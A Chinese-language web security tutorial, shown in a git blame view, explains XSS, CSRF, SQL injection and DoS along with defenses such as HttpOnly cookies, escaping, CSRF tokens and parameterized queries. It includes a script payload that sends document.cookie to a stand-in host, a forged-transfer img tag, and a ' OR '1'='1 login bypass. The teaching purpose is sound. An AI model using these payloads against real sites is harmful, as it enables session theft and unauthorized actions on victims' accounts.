攻击技术.md 7.3 KB
Newer Older
C
CyC2018 已提交
1 2 3 4 5 6 7 8
<!-- GFM-TOC -->
* [一、跨站脚本攻击](#一跨站脚本攻击)
* [二、跨站请求伪造](#二跨站请求伪造)
* [三、SQL 注入攻击](#三sql-注入攻击)
* [四、拒绝服务攻击](#四拒绝服务攻击)
* [参考资料](#参考资料)
<!-- GFM-TOC -->

C
CyC2018 已提交
9

C
CyC2018 已提交
10 11 12
# 一、跨站脚本攻击

## 概念
C
CyC2018 已提交
13

C
CyC2018 已提交
14 15 16
跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。

## 攻击原理
C
CyC2018 已提交
17

C
CyC2018 已提交
18 19 20
例如有一个论坛网站,攻击者可以在上面发布以下内容:

```html
C
CyC2018 已提交
21
<script>location.href="//domain.com/?c=" + document.cookie</script>
C
CyC2018 已提交
22 23 24 25 26
```

之后该内容可能会被渲染成以下形式:

```html
C
CyC2018 已提交
27
<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>
C
CyC2018 已提交
28 29
```

C
CyC2018 已提交
30
另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态,那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。
C
CyC2018 已提交
31

C
CyC2018 已提交
32
## 危害
C
CyC2018 已提交
33

C
CyC2018 已提交
34 35 36
- 窃取用户的 Cookie
- 伪造虚假的输入表单骗取个人信息
- 显示伪造的文章或者图片
C
CyC2018 已提交
37

C
CyC2018 已提交
38
## 防范手段
C
CyC2018 已提交
39

C
CyC2018 已提交
40
### 1. 设置 Cookie 为 HttpOnly
C
CyC2018 已提交
41

C
CyC2018 已提交
42
设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用,就无法通过 document.cookie 获取用户 Cookie 信息。
C
CyC2018 已提交
43

C
CyC2018 已提交
44
### 2. 过滤特殊字符
C
CyC2018 已提交
45

C
CyC2018 已提交
46
例如将 `<` 转义为 `&lt;`,将 `>` 转义为 `&gt;`,从而避免 HTML 和 Jascript 代码的运行。
C
CyC2018 已提交
47

C
CyC2018 已提交
48
富文本编辑器允许用户输入 HTML 代码,就不能简单地将 `<` 等字符进行过滤了,极大地提高了 XSS 攻击的可能性。
C
CyC2018 已提交
49

C
CyC2018 已提交
50
富文本编辑器通常采用 XSS filter 来防范 XSS 攻击,通过定义一些标签白名单或者黑名单,从而不允许有攻击性的 HTML 代码的输入。
C
CyC2018 已提交
51

C
CyC2018 已提交
52
以下例子中,form 和 script 等标签都被转义,而 h 和 p 等标签将会保留。
C
CyC2018 已提交
53 54

```html
C
CyC2018 已提交
55
<h1 id="title">XSS Demo</h1>
C
CyC2018 已提交
56

C
CyC2018 已提交
57
<p>123</p>
C
CyC2018 已提交
58 59

<form>
C
CyC2018 已提交
60
  <input type="text" name="q" value="test">
C
CyC2018 已提交
61 62 63 64
</form>

<pre>hello</pre>

C
CyC2018 已提交
65
<script type="text/javascript">
C
CyC2018 已提交
66 67 68 69 70
alert(/xss/);
</script>
```

```html
C
CyC2018 已提交
71
<h1>XSS Demo</h1>
C
CyC2018 已提交
72

C
CyC2018 已提交
73
<p>123</p>
C
CyC2018 已提交
74 75

&lt;form&gt;
C
CyC2018 已提交
76
  &lt;input type="text" name="q" value="test"&gt;
C
CyC2018 已提交
77 78 79 80
&lt;/form&gt;

<pre>hello</pre>

C
CyC2018 已提交
81
&lt;script type="text/javascript"&gt;
C
CyC2018 已提交
82 83 84 85
alert(/xss/);
&lt;/script&gt;
```

C
CyC2018 已提交
86
> [XSS 过滤在线测试](http://jsxss.com/zh/try.html)
C
CyC2018 已提交
87

C
CyC2018 已提交
88
# 二、跨站请求伪造
C
CyC2018 已提交
89

C
CyC2018 已提交
90
## 概念
C
CyC2018 已提交
91

C
CyC2018 已提交
92
跨站请求伪造(Cross-site request forgery,CSRF),是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。
C
CyC2018 已提交
93

C
CyC2018 已提交
94
XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户浏览器的信任。
C
CyC2018 已提交
95

C
CyC2018 已提交
96
## 攻击原理
C
CyC2018 已提交
97

C
CyC2018 已提交
98
假如一家银行用以执行转账操作的 URL 地址如下:
C
CyC2018 已提交
99 100 101 102 103 104 105 106

```
http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName。
```

那么,一个恶意攻击者可以在另一个网站上放置如下代码:

```
C
CyC2018 已提交
107
<img src="http://www.examplebank.com/withdraw?account=Alice&amount=1000&for=Badman">。
C
CyC2018 已提交
108 109
```

C
CyC2018 已提交
110
如果有账户名为 Alice 的用户访问了恶意站点,而她之前刚访问过银行不久,登录信息尚未过期,那么她就会损失 1000 美元。
C
CyC2018 已提交
111 112 113

这种恶意的网址可以有很多种形式,藏身于网页中的许多地方。此外,攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛,博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话,用户即使访问熟悉的可信网站也有受攻击的危险。

C
CyC2018 已提交
114
通过例子能够看出,攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权,也不能直接窃取用户的任何信息。他们能做到的,是欺骗用户浏览器,让其以用户的名义执行操作。
C
CyC2018 已提交
115

C
CyC2018 已提交
116
## 防范手段
C
CyC2018 已提交
117

C
CyC2018 已提交
118
### 1. 检查 Referer 首部字段
C
CyC2018 已提交
119

C
CyC2018 已提交
120
Referer 首部字段位于 HTTP 报文中,用于标识请求来源的地址。检查这个首部字段并要求请求来源的地址在同一个域名下,可以极大的防止 CSRF 攻击。
C
CyC2018 已提交
121

C
CyC2018 已提交
122
这种办法简单易行,工作量低,仅需要在关键访问处增加一步校验。但这种办法也有其局限性,因其完全依赖浏览器发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其 Referer 字段的可能。
C
CyC2018 已提交
123

C
CyC2018 已提交
124
### 2. 添加校验 Token
C
CyC2018 已提交
125

C
CyC2018 已提交
126
在访问敏感数据请求时,要求用户浏览器提供不保存在 Cookie 中,并且攻击者无法伪造的数据作为校验。例如服务器生成随机数并附加在表单中,并要求客户端传回这个随机数。
C
CyC2018 已提交
127

C
CyC2018 已提交
128
### 3. 输入验证码
C
CyC2018 已提交
129

C
CyC2018 已提交
130
因为 CSRF 攻击是在用户无意识的情况下发生的,所以要求用户输入验证码可以让用户知道自己正在做的操作。
C
CyC2018 已提交
131

C
CyC2018 已提交
132
# 三、SQL 注入攻击
C
CyC2018 已提交
133

C
CyC2018 已提交
134
## 概念
C
CyC2018 已提交
135

C
CyC2018 已提交
136
服务器上的数据库运行非法的 SQL 语句,主要通过拼接来完成。
C
CyC2018 已提交
137

C
CyC2018 已提交
138
## 攻击原理
C
CyC2018 已提交
139

C
CyC2018 已提交
140
例如一个网站登录验证的 SQL 查询代码为:
C
CyC2018 已提交
141 142

```sql
C
CyC2018 已提交
143
strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"
C
CyC2018 已提交
144 145 146 147 148
```

如果填入以下内容:

```sql
C
CyC2018 已提交
149 150
userName = "1' OR '1'='1";
passWord = "1' OR '1'='1";
C
CyC2018 已提交
151 152
```

C
CyC2018 已提交
153
那么 SQL 查询字符串为:
C
CyC2018 已提交
154 155

```sql
C
CyC2018 已提交
156
strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
C
CyC2018 已提交
157 158 159 160 161
```

此时无需验证通过就能执行以下查询:

```sql
C
CyC2018 已提交
162
strSQL = "SELECT * FROM users;"
C
CyC2018 已提交
163 164
```

C
CyC2018 已提交
165
## 防范手段
C
CyC2018 已提交
166

C
CyC2018 已提交
167
### 1. 使用参数化查询
C
CyC2018 已提交
168

C
CyC2018 已提交
169
Java 中的 PreparedStatement 是预先编译的 SQL 语句,可以传入适当参数并且多次执行。由于没有拼接的过程,因此可以防止 SQL 注入的发生。
C
CyC2018 已提交
170 171

```java
C
CyC2018 已提交
172 173 174 175
PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
stmt.setString(1, userid);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();
C
CyC2018 已提交
176 177
```

C
CyC2018 已提交
178 179 180 181 182 183 184 185 186
### 2. 单引号转换

将传入的参数中的单引号转换为连续两个单引号,PHP 中的 Magic quote 可以完成这个功能。

# 四、拒绝服务攻击

拒绝服务攻击(denial-of-service attack,DoS),亦称洪水攻击,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。

分布式拒绝服务攻击(distributed denial-of-service attack,DDoS),指攻击者使用两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。
C
CyC2018 已提交
187

C
CyC2018 已提交
188
# 参考资料
C
CyC2018 已提交
189

C
CyC2018 已提交
190 191 192 193
- [维基百科:跨站脚本](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC)
- [维基百科:SQL 注入攻击](https://zh.wikipedia.org/wiki/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A)
- [维基百科:跨站点请求伪造](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0)
- [维基百科:拒绝服务攻击](https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A)
C
CyC2018 已提交
194 195 196 197 198 199






C
CyC2018 已提交
200
<div align="center"><img width="320px" src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/githubio/公众号二维码-2.png"></img></div>